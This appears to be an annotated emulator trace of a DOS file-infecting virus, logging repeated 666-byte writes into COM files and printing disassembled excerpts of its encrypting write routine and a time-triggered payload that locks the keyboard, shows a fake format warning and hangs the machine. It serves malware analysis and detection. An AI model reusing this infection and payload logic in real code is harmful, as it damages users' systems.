2018-12-25T12:43:32.36249078Z 9 PC: 12cdb | Display string (String= ' WARNING: ALL DATA ON NON-REMOVABLE DISK DRIVE C: WILL BE LOST! Proced with Format (Y/N)? Yes Ok')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":1,"Second":0,"TimeBased":true,"OriginalID":15470,"SideJobID":0}

.


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:43:30.804714561Z 26 PC: 12aa4 | Set disk transfer address
2018-12-25T12:43:30.806061867Z 78 PC: 12ab7 | Find first file
2018-12-25T12:43:30.812909269Z 47 PC: 12abd | Get disk transfer address
2018-12-25T12:43:30.81417988Z 67 PC: 12c43 | Get or set file attributes
2018-12-25T12:43:30.820545424Z 67 PC: 12c4b | Get or set file attributes
2018-12-25T12:43:30.838119098Z 61 PC: 12c51 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:43:30.845827637Z 87 PC: 12c58 | Get or set file date and time
2018-12-25T12:43:30.84756607Z 63 PC: 12af6 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:43:30.855369862Z 66 PC: 12b19 | Move file pointer
; Infection write path, annotated for analysis. The PC in the trace entry below is the
; return address of int 21h "Get time" (AH=2Ch): CH=hour, CL=minute, DH=second, DL=1/100 s.
2018-12-25T12:43:30.85786615Z 44 PC: 12a6e | Get time 0x12a6e: xor cx, dx    ; fold the four time fields together
0x12a70: xor ch, cl    ; reduce to one byte in CH
0x12a72: mov byte ptr [di + 0x10], ch    ; store the time-derived byte at [di+0x10] (presumably a per-copy key; confirm in the called routine)
0x12a75: call 0x22a4e    ; NOTE(review): a rel16 call wraps inside the 64 KiB segment, so the real target is presumably 0x12a4e
0x12a78: pop bx    ; drops one word from the stack (its origin is not visible in this excerpt)
0x12a79: popaw    ; restores registers, presumably saved by a pushaw before this excerpt
0x12a7a: mov ah, byte ptr [di + 9]    ; DOS function number read from memory, not an immediate; the trace records it as 64 (0x40, write)
0x12a7d: mov cx, 0x29a    ; 0x29a = 666 bytes, the length in the trace's "Write 666 bytes"
0x12a80: nop
0x12a81: mov dx, di    ; buffer = DS:DI
0x12a83: int 0x21    ; the trace records this call as a 666-byte write on handle 5
0x12a85: pushaw
0x12a86: call 0x22a4e    ; same routine again after the write; presumably undoes the transform on the in-memory copy
0x12a89: pop bx
0x12a8a: popaw
0x12a8b: ret
; Detection note: if [di+0x10] is a key, each written copy differs in its transformed
; bytes, so signatures should be anchored on code that stays constant - TODO confirm.
; The instructions below follow the ret and belong to another routine cut off by the excerpt.
0x12a8c: xchg si, di
0x12a8e: pop si
0x12a8f: sub si, 6
0x12a92: push si
2018-12-25T12:43:30.860905088Z 64 PC: 12a85 | Write file or device (Write 666 bytes on handle 5)
2018-12-25T12:43:30.874076248Z 66 PC: 12b37 | Move file pointer
2018-12-25T12:43:30.875605183Z 64 PC: 12b57 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:43:30.882934237Z 87 PC: 12b60 | Get or set file date and time
2018-12-25T12:43:30.884847128Z 62 PC: 12b66 | Close file
2018-12-25T12:43:30.893810205Z 67 PC: 12b6d | Get or set file attributes
2018-12-25T12:43:30.905852211Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:30.909590802Z 47 PC: 12abd | Get disk transfer address (See above)
2018-12-25T12:43:30.911292155Z 67 PC: 12c43 | Get or set file attributes (See above)
2018-12-25T12:43:30.91813331Z 67 PC: 12c4b | Get or set file attributes (See above)
2018-12-25T12:43:30.929539709Z 61 PC: 12c51 | Open file (See above)
2018-12-25T12:43:30.940910395Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:43:30.942895968Z 63 PC: 12af6 | Read file or device (See above)
2018-12-25T12:43:30.950636199Z 66 PC: 12b19 | Move file pointer (See above)
2018-12-25T12:43:30.953430165Z 44 PC: 12a6e | Get time (See above)
2018-12-25T12:43:30.956525741Z 64 PC: 12a85 | Write file or device (See above)
2018-12-25T12:43:30.96634258Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:43:30.969135866Z 64 PC: 12b57 | Write file or device (See above)
2018-12-25T12:43:30.976696158Z 87 PC: 12b60 | Get or set file date and time (See above)
2018-12-25T12:43:30.978523153Z 62 PC: 12b66 | Close file (See above)
2018-12-25T12:43:30.988217196Z 67 PC: 12b6d | Get or set file attributes (See above)
2018-12-25T12:43:30.999562007Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:31.003823414Z 47 PC: 12abd | Get disk transfer address (See above)
2018-12-25T12:43:31.006797101Z 67 PC: 12c43 | Get or set file attributes (See above)
2018-12-25T12:43:31.013471519Z 67 PC: 12c4b | Get or set file attributes (See above)
2018-12-25T12:43:31.024800534Z 61 PC: 12c51 | Open file (See above)
2018-12-25T12:43:31.033716586Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:43:31.036179447Z 63 PC: 12af6 | Read file or device (See above)
2018-12-25T12:43:31.044343424Z 66 PC: 12b19 | Move file pointer (See above)
2018-12-25T12:43:31.047205226Z 44 PC: 12a6e | Get time (See above)
2018-12-25T12:43:31.064702967Z 64 PC: 12a85 | Write file or device (See above)
2018-12-25T12:43:31.074755774Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:43:31.07648708Z 64 PC: 12b57 | Write file or device (See above)
2018-12-25T12:43:31.085384485Z 87 PC: 12b60 | Get or set file date and time (See above)
2018-12-25T12:43:31.087452328Z 62 PC: 12b66 | Close file (See above)
2018-12-25T12:43:31.097201084Z 67 PC: 12b6d | Get or set file attributes (See above)
2018-12-25T12:43:31.123827917Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:31.127103715Z 47 PC: 12abd | Get disk transfer address (See above)
2018-12-25T12:43:31.129684787Z 67 PC: 12c43 | Get or set file attributes (See above)
2018-12-25T12:43:31.137065732Z 67 PC: 12c4b | Get or set file attributes (See above)
2018-12-25T12:43:31.148262475Z 61 PC: 12c51 | Open file (See above)
2018-12-25T12:43:31.155927732Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:43:31.158601577Z 63 PC: 12af6 | Read file or device (See above)
2018-12-25T12:43:31.16687289Z 66 PC: 12b19 | Move file pointer (See above)
2018-12-25T12:43:31.168890797Z 44 PC: 12a6e | Get time (See above)
2018-12-25T12:43:31.171919603Z 64 PC: 12a85 | Write file or device (See above)
2018-12-25T12:43:31.18217914Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:43:31.183980063Z 64 PC: 12b57 | Write file or device (See above)
2018-12-25T12:43:31.191168042Z 87 PC: 12b60 | Get or set file date and time (See above)
2018-12-25T12:43:31.194033819Z 62 PC: 12b66 | Close file (See above)
2018-12-25T12:43:31.203134931Z 67 PC: 12b6d | Get or set file attributes (See above)
2018-12-25T12:43:31.21417003Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:31.218236567Z 47 PC: 12abd | Get disk transfer address (See above)
2018-12-25T12:43:31.219458247Z 67 PC: 12c43 | Get or set file attributes (See above)
2018-12-25T12:43:31.225430511Z 67 PC: 12c4b | Get or set file attributes (See above)
2018-12-25T12:43:31.236511356Z 61 PC: 12c51 | Open file (See above)
2018-12-25T12:43:31.243976283Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:43:31.245716244Z 63 PC: 12af6 | Read file or device (See above)
2018-12-25T12:43:31.253054555Z 66 PC: 12b19 | Move file pointer (See above)
2018-12-25T12:43:31.255955272Z 44 PC: 12a6e | Get time (See above)
2018-12-25T12:43:31.259091792Z 64 PC: 12a85 | Write file or device (See above)
2018-12-25T12:43:31.269082127Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:43:31.271870862Z 64 PC: 12b57 | Write file or device (See above)
2018-12-25T12:43:31.279300583Z 87 PC: 12b60 | Get or set file date and time (See above)
2018-12-25T12:43:31.281164283Z 62 PC: 12b66 | Close file (See above)
2018-12-25T12:43:31.290942636Z 67 PC: 12b6d | Get or set file attributes (See above)
2018-12-25T12:43:31.306192905Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:31.309485354Z 47 PC: 12abd | Get disk transfer address (See above)
2018-12-25T12:43:31.31157266Z 67 PC: 12c43 | Get or set file attributes (See above)
2018-12-25T12:43:31.318061806Z 67 PC: 12c4b | Get or set file attributes (See above)
2018-12-25T12:43:31.329821532Z 61 PC: 12c51 | Open file (See above)
2018-12-25T12:43:31.337851207Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:43:31.339669603Z 63 PC: 12af6 | Read file or device (See above)
2018-12-25T12:43:31.347068136Z 66 PC: 12b19 | Move file pointer (See above)
2018-12-25T12:43:31.348993787Z 44 PC: 12a6e | Get time (See above)
2018-12-25T12:43:31.352467964Z 64 PC: 12a85 | Write file or device (See above)
2018-12-25T12:43:31.362807717Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:43:31.364788775Z 64 PC: 12b57 | Write file or device (See above)
2018-12-25T12:43:31.373361061Z 87 PC: 12b60 | Get or set file date and time (See above)
2018-12-25T12:43:31.375092538Z 62 PC: 12b66 | Close file (See above)
2018-12-25T12:43:31.384443987Z 67 PC: 12b6d | Get or set file attributes (See above)
2018-12-25T12:43:31.396611223Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:31.399533882Z 47 PC: 12abd | Get disk transfer address (See above)
2018-12-25T12:43:31.400997711Z 67 PC: 12c43 | Get or set file attributes (See above)
2018-12-25T12:43:31.408262631Z 67 PC: 12c4b | Get or set file attributes (See above)
2018-12-25T12:43:31.420024571Z 61 PC: 12c51 | Open file (See above)
2018-12-25T12:43:31.427829002Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:43:31.430196305Z 63 PC: 12af6 | Read file or device (See above)
2018-12-25T12:43:31.43753743Z 66 PC: 12b19 | Move file pointer (See above)
2018-12-25T12:43:31.439507712Z 44 PC: 12a6e | Get time (See above)
2018-12-25T12:43:31.444097958Z 64 PC: 12a85 | Write file or device (See above)
2018-12-25T12:43:31.454008209Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:43:31.456834671Z 64 PC: 12b57 | Write file or device (See above)
2018-12-25T12:43:31.464437918Z 87 PC: 12b60 | Get or set file date and time (See above)
2018-12-25T12:43:31.467699406Z 62 PC: 12b66 | Close file (See above)
2018-12-25T12:43:31.476742628Z 67 PC: 12b6d | Get or set file attributes (See above)
2018-12-25T12:43:31.488260405Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:31.492739765Z 47 PC: 12abd | Get disk transfer address (See above)
2018-12-25T12:43:31.49444487Z 67 PC: 12c43 | Get or set file attributes (See above)
2018-12-25T12:43:31.5011131Z 67 PC: 12c4b | Get or set file attributes (See above)
2018-12-25T12:43:31.509867423Z 61 PC: 12c51 | Open file (See above)
2018-12-25T12:43:31.517193726Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:43:31.518338291Z 63 PC: 12af6 | Read file or device (See above)
2018-12-25T12:43:31.524081498Z 87 PC: 12b60 | Get or set file date and time (See above)
2018-12-25T12:43:31.526299332Z 62 PC: 12b66 | Close file (See above)
2018-12-25T12:43:31.534604722Z 67 PC: 12b6d | Get or set file attributes (See above)
2018-12-25T12:43:31.548589381Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:31.552435662Z 78 PC: 12c06 | Find first file
2018-12-25T12:43:31.560024046Z 78 PC: 12c06 | Find first file (See above)
2018-12-25T12:43:31.567803643Z 78 PC: 12b97 | Find first file
; Time-triggered payload, annotated for analysis. The PC in the trace entry below is the
; return address of int 21h "Get time" (AH=2Ch), which returns CH=hour and CL=minute.
2018-12-25T12:43:31.585710747Z 44 PC: 12cc5 | Get time 0x12cc5: cmp ch, cl    ; trigger test: hour == minute?
0x12cc7: je 0x12cca    ; equal -> payload
0x12cc9: ret    ; otherwise return with no visible effect
0x12cca: cli    ; mask interrupts while the controller is programmed
0x12ccb: mov al, 0xad    ; 0xAD = 8042 "disable keyboard interface" command
0x12ccd: out 0x64, al    ; port 0x64 = keyboard controller command port
0x12ccf: nop
0x12cd0: sti
0x12cd1: mov dx, di
0x12cd3: add dx, 0x218    ; DX = DI + 0x218, offset of the message text
0x12cd7: mov ah, 9    ; int 21h AH=09h: print '$'-terminated string at DS:DX
0x12cd9: int 0x21
0x12cdb: cli
0x12cdc: jmp 0x12cdc    ; jumps to itself with interrupts masked: the machine hangs here
; No disk write or format call appears in this excerpt; the visible effect is keyboard
; lock-out, a message, and a hang.
; NOTE(review): the bytes below follow an unconditional self-jump and are not reached by
; fall-through. `aas` is opcode 0x3F (ASCII '?'), so this is probably data decoded as code.
0x12cde: add word ptr [bx], di
0x12ce0: aas
0x12ce1: aas
0x12ce2: aas
0x12ce3: aas
0x12ce4: aas
; In this run the next recorded call is "Set disk transfer address", not "Display string",
; so the je appears not to have been taken.
2018-12-25T12:43:31.588205833Z 26 PC: 12ad6 | Set disk transfer address